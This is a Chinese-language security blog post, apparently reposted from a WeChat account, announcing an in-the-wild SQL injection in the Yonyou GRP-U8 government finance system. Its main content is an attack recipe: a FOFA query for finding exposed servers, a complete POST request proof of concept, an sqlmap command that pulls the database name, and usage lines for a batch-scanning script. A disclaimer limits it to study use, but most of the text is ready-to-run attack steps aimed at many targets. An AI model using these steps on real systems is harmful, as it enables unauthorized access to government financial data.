【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞

admin 2023年9月23日14:52:08评论41 views字数 1127阅读3分45秒阅读模式


免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。



一、漏洞描述

用友GRP-U8是面向政府及行政事业单位的财政管理应用,bx_historyDataCheck.jsp 存在SQL注入漏洞。


【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞


二、影响范围

用友GRP-U8

三、fofa查询语法

app="用友-GRP-U8"


三、漏洞复现

POC

POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=B3960966C1BE7C7AB8132DF80D1C9149DNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 10
userName=1


【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞

四、漏洞利用

将上面poc 里面HOST字段的 ip:port 替换成目标地址端口,保存到txt文件中,使用SQLmap进行注入利用。

例:将poc更换IP后保存到post.txt中,获取当前数据库名称(kali环境)

sqlmap -r post.txt --technique S --batch -v 3 --current-db


【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞

【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞

五、批量检测

单个检测

python .bx_historyDataCheck-SQL.py -u http://ip:port


【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞

批量检测

python  bx_historyDataCheck-SQL.py  -f  filename

【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞


批量检测代码 关注微信公众号 网络安全透视镜 回复 20230923 获取

【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞


免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞


原文始发于微信公众号(网络安全透视镜):【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月23日14:52:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【在野0 day 用友GRP-U8 SQL注入】 bx_historyDataCheck SQL注入漏洞http://cn-sec.com/archives/2061459.html

发表评论

匿名网友 填写信息